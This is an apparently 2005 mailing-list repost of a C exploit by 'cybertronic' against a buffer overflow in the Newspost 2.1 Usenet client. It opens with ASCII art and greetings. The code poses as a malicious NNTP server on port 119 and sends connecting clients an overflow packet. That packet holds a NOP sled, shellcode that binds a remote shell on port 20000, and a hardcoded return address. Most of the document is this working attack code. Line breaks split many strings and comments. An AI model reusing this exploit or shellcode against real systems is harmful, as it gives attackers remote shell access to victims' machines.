RE: SECURITEY.NNOV.RU NewsPost buffer overflow [EXPLOIT]
/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow
Exploit
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n
cyber -s tronic <file>
Greetz fly to my girlfriend YASMIN H.
?
?M
M
?MMM
MMm
?MMMM
M$$MMm
?MMMMM.
MM$$MMMMm
MMMMMMMM
`MM$$MMMMMMm 4MMMM$
$MM
MMM$$MMMMMMMMm ?MMMM$
$MMM
MMM$$$MMMMMMMMm mMMMM
$MMMM
`MMM$$$MMMMMMMm MMMM
$MMMM?
MMMM$$$MMMMMMMm MMM$
$MMM?
`MMMMMMMMMMMMMm MMMMMMM?
`MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
?MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM<º >MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
?Mn ?MMMMMMMMMMMMMMMMMMMMMMMMM
?Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM?
n?
`? MMMMMMMMMMMMMMMMM?
n?
MMMMMM?
mtr?
mMMM nmM mM
mM?? M ' M n
mM$ nM n?MMn?Ä
4M m ?M N ?
?`
m? `n? mM NM? NM
mM mMm nm M??MÄ? n?Mm ?n xnÄ, ?
?n xnÄ ?Mm Mn n? nM nMm
mM `mMM? nM M nM ,` ?n? y M
?n? y nM ? nM Ä Ä ?
M? M' ?Ä M n.,? nm nM
nM n M ? Ä ? n
MM? mM M nM Ä M? n , nM ?Ä
nM M nM M M M? M n
MMM? M? nM MÄÄM n?nN ?M nM ?M
`?M? ?? .N nM ?nM?
M?
n?
cybertronic 2oo5
?
________________
----------------------/
MMMMMMMMm
mMMMMMMM?
?MM$MMMMMMMMMm
mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm
mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM
MMMMMMMMMMM(c)MMMM?
ºÕÍÄúú just want to say love you
dad! úúÄÍÕº
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
#define BACKLOG 5
//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor
ebx, ebx
"\xf7\xe3" // mul
ebx
"\xb0\x66" // mov
al, 102
"\x53" // push
ebx
"\x43" // inc
ebx
"\x53" // push
ebx
"\x43" // inc
ebx
"\x53" // push
ebx
"\x89\xe1" // mov
ecx, esp
"\x4b" // dec
ebx
"\xcd\x80" // int
80h
"\x89\xc7" // mov
edi, eax
"\x52" // push
edx
"\x66\x68\x4e\x20" // push
word 8270
"\x43" // inc
ebx
"\x66\x53" // push bx
"\x89\xe1" // mov
ecx, esp
"\xb0\xef" // mov
al, 239
"\xf6\xd0" // not al
"\x50" // push
eax
"\x51" // push
ecx
"\x57" // push
edi
"\x89\xe1" // mov
ecx, esp
"\xb0\x66" // mov
al, 102
"\xcd\x80" // int
80h
"\xb0\x66" // mov
al, 102
"\x43" // inc
ebx
"\x43" // inc
ebx
"\xcd\x80" // int
80h
"\x50" // push
eax
"\x50" // push
eax
"\x57" // push
edi
"\x89\xe1" // mov
ecx, esp
"\x43" // inc
ebx
"\xb0\x66" // mov
al, 102
"\xcd\x80" // int
80h
"\x89\xd9" // mov
ecx, ebx
"\x89\xc3" // mov
ebx, eax
"\xb0\x3f" // mov
al, 63
"\x49" // dec
ecx
"\xcd\x80" // int
80h
"\x41" // inc
ecx
"\xe2\xf8" // loop lp
"\x51" // push
ecx
"\x68\x6e\x2f\x73\x68" // push
dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push
dword 69622f2fh
"\x89\xe3" // mov
ebx, esp
"\x51" // push
ecx
"\x53" // push
ebx
"\x89\xe1" // mov
ecx, esp
"\xb0\xf4" // mov
al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int
80h
void cmd ( int connfd );
void header ();
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET,
SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl
( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * )
&servaddr, sizeof ( servaddr ) );
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd,
( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN "
Incomming connection from:\t %s\n" NORMAL, inet_ntoa
( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}
void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;
bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof
( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u
bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "###
" BLUE "### " RED "### " GREEN "### " YELLOW "### "
BLUE "### " RED "# # " GREEN "# " YELLOW "###\n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# #
" BLUE "# " RED "# # " GREEN " # " YELLOW "# # "
BLUE "# # " RED "## # " GREEN "# " YELLOW "# \n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "###
" BLUE "### " RED "### " GREEN " # " YELLOW "### "
BLUE "# # " RED "# # # " GREEN "# " YELLOW "# \n"
NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# #
" BLUE "# " RED "# # " GREEN " # " YELLOW "# # "
BLUE "# # " RED "# ## " GREEN "# " YELLOW "# \n"
NORMAL);
printf ( RED "### " GREEN " # " YELLOW "###
" BLUE "### " RED "# # " GREEN " # " YELLOW "# # "
BLUE "### " RED "# # " GREEN "# " YELLOW "###\n"
NORMAL);
printf ( RED "
cybertronic@xxxxxxx\n" NORMAL );
printf ( RED " ----------(c)
2005----------\n\n" NORMAL );
printf ( "newspost-2.1\n\n" );
}